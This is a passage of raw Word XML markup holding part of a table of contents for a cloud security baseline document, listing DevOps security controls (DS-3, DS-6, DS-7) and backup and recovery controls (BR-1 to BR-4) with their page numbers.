            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Shift left the security controls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449565 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>184</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63F36246" w14:textId="58CA3BC8" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449566" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DS-3: Secure the DevOps infrastructure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449566 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>184</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B0E0368" w14:textId="5FA725FF" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449567" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449567 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>187</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33A55671" w14:textId="2CBB7571" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449568" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">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_Toc242449568 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>190</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68F20697" w14:textId="2E85D56B" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449569" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DS-6: Secure the workload lifecycle</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>193</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27F3AB05" w14:textId="7BD58DD3" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449570" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Monitor and audit DevOps activities</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49F4A254" w14:textId="2F488D91" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449571" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DS-7: Implement DevOps logging and monitoring</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>196</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49043D3E" w14:textId="7AD4FCD7" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="720"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449572" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backup and Recovery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>199</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42AE4D5D" w14:textId="61169F4F" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449573" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backup automation and coverage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>199</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33DABA75" w14:textId="2DCC5662" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449574" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BR-1: Ensure regular automated backups</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>199</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="692FF3E4" w14:textId="019F170D" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449575" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BR-3: Monitor backups</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>204</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FAC666A" w14:textId="7EC974E1" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449576" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backup data protection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>208</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43E1E2A0" w14:textId="3B51D340" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449577" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BR-2: Protect backup and recovery data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>208</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BBFE02D" w14:textId="2D8D785A" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449578" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recovery readiness</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>213</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B080633" w14:textId="17560FA5" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1440"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc242449579" w:history="1">
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>11.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="002B161B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>BR-4: Regularly test backup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc242449579 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>213</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DE2A2EE" w14:textId="16C3E9CA" w:rsidR="00831807" w:rsidRDefault="00831807">
          <w:pPr>
